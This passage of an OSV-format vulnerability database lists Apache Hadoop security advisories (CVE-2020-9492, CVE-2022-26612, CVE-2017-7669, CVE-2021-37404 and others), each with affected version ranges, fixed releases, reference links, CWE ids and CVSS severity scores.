"fixed": "3.2.2" } ] } ], "versions": [ "3.2.0", "3.2.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-f8vc-wfc8-hxqh/GHSA-f8vc-wfc8-hxqh.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.4" } ] } ], "versions": [ "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.1.0", "3.1.1", "3.1.2", "3.1.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-f8vc-wfc8-hxqh/GHSA-f8vc-wfc8-hxqh.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, 
"ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.10.1" } ] } ], "versions": [ "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.10.0", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.9.0", "2.9.1", "2.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-f8vc-wfc8-hxqh/GHSA-f8vc-wfc8-hxqh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-9492" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/ca65409836d2949e9a9408d40bec0177b414cd5d" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210304-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4129c6b9e0410848bbd3761187ce9c19bc1cd491037b253007df99e@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca4516b00b55b347905df45e5d0432186248223f30497db87aba8710@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc0057ebf32b646ab47f7f5744a8948332e015c39044cbb9d87ea76cd@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb12afaa421d483863c4175e42e5dbd0673917a3cff73f3fca4f8275f@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r941e9be04efe0f455d20aeac88516c0848decd7e7b1d93d5687060f4@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9328eb49305e4cacc80e182bfd8a2efd8e640d940e24f5bfd7d5cb26@%3Cissues.solr.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r79323adac584edab99fd5e4b52a013844b784a5d4b600da0662b33d6@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r79201a209df9a4e7f761e537434131b4e39eabec4369a7d668904df4@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6c2fa7949738e9d39606f1d7cd890c93a2633e3357c9aeaf886ea9a6@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6341f2a468ced8872a71997aa1786ce036242413484f0fa68dc9ca02@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r513758942356ccd0d14538ba18a09903fc72716d74be1cb727ea91ff%40%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4a57de5215494c35c8304cf114be75d42df7abc6c0c54bf163c3e370@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r49c9ab444ab1107c6a8be8a0d66602dec32a16d96c2631fec8d309fb@%3Cissues.solr.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0a534f1cde7555f7208e9f9b791c1ab396d215eaaef283b3a9153429@%3Ccommits.druid.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" } ], "database_specific": { "cwe_ids": [ "CWE-269", "CWE-863" ], "github_reviewed": true, "github_reviewed_at": "2021-04-06T18:29:12Z", "nvd_published_at": "2021-01-26T18:16:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g48f-ff5h-5f64", "published": "2022-05-17T03:44:57Z", "modified": "2023-11-08T03:57:50.385135Z", "aliases": [ "CVE-2015-1776" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Hadoop", "details": "Apache Hadoop 2.6.x encrypts intermediate data generated by a MapReduce job and stores it along with the encryption key in a credentials file 
on disk when the Intermediate data encryption feature is enabled, which allows local users to obtain sensitive information by reading the file.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.6.0" }, { "fixed": "2.6.5" } ] } ], "versions": [ "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-g48f-ff5h-5f64/GHSA-g48f-ff5h-5f64.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1776" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/hadoop-general/201602.mbox/%3CCAGCyb56CPgQMcxZ7jP87SfM5OKGx+E49DtrzCTQ6+nQf2a4nSA@mail.gmail.com%3E" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T20:26:12Z", "nvd_published_at": "2016-04-19T21:59:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gx2c-fvhc-ph4j", "published": "2022-04-08T00:00:21Z", "modified": "2025-10-01T14:55:55.727257Z", "aliases": [ "CVE-2022-26612" ], "summary": "Path traversal in Hadoop", "details": "In Apache Hadoop, The unTar function uses unTarUsingJava function on Windows and the built-in tar utility on Unix and other OSes. As a result, a TAR entry may create a symlink under the expected extraction directory which points to an external directory. A subsequent TAR entry may extract an arbitrary file into the external directory using the symlink name. This however would be caught by the same targetDirPath check on Unix because of the getCanonicalPath call. 
However on Windows, getCanonicalPath doesn't resolve symbolic links, which bypasses the check. unpackEntries during TAR extraction follows symbolic links which allows writing outside expected base directory on Windows. This was addressed in Apache Hadoop 2.10.2, 3.2.3, 3.3.3, and 3.4.0.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.2.0" }, { "fixed": "3.2.3" } ] } ], "versions": [ "3.2.0", "3.2.1", "3.2.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-gx2c-fvhc-ph4j/GHSA-gx2c-fvhc-ph4j.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.10.2" } ] } ], "versions": [ "0.22.0", "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.10.0", "2.10.1", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.9.0", "2.9.1", "2.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-gx2c-fvhc-ph4j/GHSA-gx2c-fvhc-ph4j.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.3.0" }, { "fixed": "3.3.3" } ] } ], "versions": [ "3.3.0", "3.3.1", "3.3.2" ], 
"database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-gx2c-fvhc-ph4j/GHSA-gx2c-fvhc-ph4j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26612" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commits/rel/release-2.10.2/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/fs/FileUtil.java" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commits/rel/release-3.2.3/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/fs/FileUtil.java" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commits/rel/release-3.3.3/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/fs/FileUtil.java" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commits/rel/release-3.4.0/hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/fs/FileUtil.java" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/HADOOP-18317" }, { "type": "WEB", "url": "https://lists.apache.org/thread/hslo7wzw2449gv1jyjk8g6ttd7935fyz" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220519-0004" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2022-04-08T22:06:47Z", "nvd_published_at": "2022-04-07T19:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-h24p-qwf4-84q8", "published": "2022-05-17T02:41:57Z", "modified": "2023-11-08T03:59:26.035253Z", "aliases": [ "CVE-2017-7669" ], "summary": "Apache Hadoop's LinuxContainerExecutor runs docker commands as root with insufficient input validation", "details": "In Apache Hadoop 2.8.0, 3.0.0-alpha1, and 3.0.0-alpha2, the LinuxContainerExecutor runs docker commands as root with 
insufficient input validation. When the docker feature is enabled, authenticated users can run commands as root. This issue is fixed in versions 2.8.1 and 3.0.0-alpha3.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.8.1" } ] } ], "versions": [ "0.22.0", "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-h24p-qwf4-84q8/GHSA-h24p-qwf4-84q8.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-alpha1" }, { "fixed": "3.0.0-alpha3" } ] } ], "versions": [ "3.0.0-alpha1", "3.0.0-alpha2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-h24p-qwf4-84q8/GHSA-h24p-qwf4-84q8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7669" }, { "type": "WEB", "url": "https://mail-archives.apache.org/mod_mbox/hadoop-user/201706.mbox/%3C4A2FDA56-491B-4C2A-915F-C9D4A4BDB92A%40apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/98795" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-11-22T18:47:34Z", "nvd_published_at": 
"2017-06-05T01:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mf7c-35mq-75pj", "published": "2022-05-14T03:24:59Z", "modified": "2023-11-08T03:58:33.830753Z", "aliases": [ "CVE-2016-6811" ], "summary": "Insecure Inherited Permissions in Apache Hadoop", "details": "In Apache Hadoop 2.x before 2.7.4, a user who can escalate to yarn user can possibly run arbitrary commands as root user.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0-alpha" }, { "fixed": "2.7.4" } ] } ], "versions": [ "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-mf7c-35mq-75pj/GHSA-mf7c-35mq-75pj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6811" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9ba3c12bbdfd5b2cae60909e48f92608e00c8d99196390b8cfeca307@%3Cgeneral.hadoop.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-277" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:45:49Z", "nvd_published_at": "2017-04-11T14:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-pxv5-5vmp-3jj4", "published": "2022-05-17T02:54:07Z", "modified": "2024-12-06T05:49:00.331067Z", "aliases": [ 
"CVE-2013-2192" ], "summary": "Improper Authentication in Apache Hadoop", "details": "The RPC protocol implementation in Apache Hadoop 2.x before 2.0.6-alpha, 0.23.x before 0.23.9, and 1.x before 1.2.1, when the Kerberos security features are enabled, allows man-in-the-middle attackers to disable bidirectional authentication and obtain sensitive information by forcing a downgrade to simple authentication.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.0.6-alpha" } ] } ], "versions": [ "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.0.5-alpha", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-pxv5-5vmp-3jj4/GHSA-pxv5-5vmp-3jj4.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.23.0" }, { "fixed": "0.23.9" } ] } ], "versions": [ "0.23.1", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-pxv5-5vmp-3jj4/GHSA-pxv5-5vmp-3jj4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-2192" }, { "type": "WEB", "url": "https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0037.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-0400.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2013/Aug/251" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], 
"github_reviewed": true, "github_reviewed_at": "2022-07-08T19:10:34Z", "nvd_published_at": "2014-01-24T18:55:00Z", "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-rmpj-7c96-mrg8", "published": "2022-06-14T00:00:37Z", "modified": "2024-02-22T05:34:28.037449Z", "aliases": [ "CVE-2021-37404" ], "summary": "Apache Hadoop heap overflow before v2.10.2, v3.2.3, v3.3.2", "details": "There is a potential heap buffer overflow in Apache Hadoop libhdfs native code. Opening a file path provided by user without validation may result in a denial of service or arbitrary code execution. Users should upgrade to Apache Hadoop 2.10.2, 3.2.3, 3.3.2 or higher.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.3.0" }, { "fixed": "3.3.2" } ] } ], "versions": [ "3.3.0", "3.3.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/06/GHSA-rmpj-7c96-mrg8/GHSA-rmpj-7c96-mrg8.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.2.3" } ] } ], "versions": [ "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.2.0", "3.2.1", "3.2.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/06/GHSA-rmpj-7c96-mrg8/GHSA-rmpj-7c96-mrg8.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.10.2" } ] } ], "versions": [ "0.22.0", "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", 
"0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.10.0", "2.10.1", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.9.0", "2.9.1", "2.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/06/GHSA-rmpj-7c96-mrg8/GHSA-rmpj-7c96-mrg8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37404" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://lists.apache.org/thread/2h56ztcj3ojc66qzf1nno88vjw9vd4wo" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220715-0007" } ], "database_specific": { "cwe_ids": [ "CWE-120", "CWE-131", "CWE-787" ], "github_reviewed": true, "github_reviewed_at": "2022-06-17T01:09:36Z", "nvd_published_at": "2022-06-13T07:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-37pw-qw47-4jxm", "published": "2019-05-31T16:09:15Z", "modified": "2024-02-16T08:05:28.334834Z", "aliases": [ "CVE-2018-8029" ], "summary": "Privilege escalation vulnerability in Apache Hadoop", "details": "In Apache Hadoop versions 3.0.0-alpha1 to 3.1.0, 2.9.0 to 2.9.1, and 2.2.0 to 2.8.4, a user who can escalate to yarn user can possibly run arbitrary commands as root user.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.2.0" }, { "fixed": "2.8.4" } ] } ], "versions": [ "2.2.0", "2.3.0", "2.4.0", "2.4.1", 
"2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-37pw-qw47-4jxm/GHSA-37pw-qw47-4jxm.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.2" } ] } ], "versions": [ "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-37pw-qw47-4jxm/GHSA-37pw-qw47-4jxm.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.1" } ] } ], "versions": [ "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.1.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-37pw-qw47-4jxm/GHSA-37pw-qw47-4jxm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8029" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0b8d58e02dbd0fb8bf7320c514fe58da1d6728bdc150f1ba04e0d9fc@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/17084c09e6dedf60efe08028b429c92ffd28aacc28454e4fa924578a@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a0164b87660223a2d491f83c88f905fe1a9fa8dc795148d9b0d968c8@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a97c53a81e639ca2fc7b8f61a4fcd1842c2a78544041244a7c624727@%3Cissues.hbase.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r4dddf1705dbedfa94392913b2dad1cd2d1d89040facd389eea0b3510@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb21df54a4e39732ce653d2aa5672e36a792b59eb6717f2a06bb8d02a@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190617-0001" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/108518" } ], "database_specific": { "cwe_ids": [ "CWE-285" ], "github_reviewed": true, "github_reviewed_at": "2019-05-31T16:08:38Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3v44-382q-55f4", "published": "2018-12-21T17:50:13Z", "modified": "2023-11-08T03:58:58.547397Z", "aliases": [ "CVE-2017-15713" ], "summary": "Moderate severity vulnerability that affects org.apache.hadoop:hadoop-main", "details": "Vulnerability in Apache Hadoop 0.23.x, 2.x before 2.7.5, 2.8.x before 2.8.3, and 3.0.0-alpha through 3.0.0-beta1 allows a cluster user to expose private files owned by the user running the MapReduce job history server process. 
The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.5" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-3v44-382q-55f4/GHSA-3v44-382q-55f4.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-3v44-382q-55f4/GHSA-3v44-382q-55f4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15713" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-3v44-382q-55f4" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a790a251ace7213bde9f69777dedb453b1a01a6d18289c14a61d4f91@%3Cgeneral.hadoop.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:56:25Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": 
"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4fh8-pm7g-pmxq", "published": "2022-02-10T20:28:06Z", "modified": "2024-02-17T05:29:43.227712Z", "aliases": [ "CVE-2018-11764" ], "summary": "Authentication bypass in Apache Hadoop", "details": "Web endpoint authentication check is broken in Apache Hadoop 3.0.0-alpha4, 3.0.0-beta1, and 3.0.0. Authenticated users may impersonate any user even if no proxy user is configured.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-alpha4" }, { "fixed": "3.0.1" } ] } ], "versions": [ "3.0.0-alpha4", "3.0.0", "3.0.0-beta1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-4fh8-pm7g-pmxq/GHSA-4fh8-pm7g-pmxq.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-beta1" }, { "fixed": 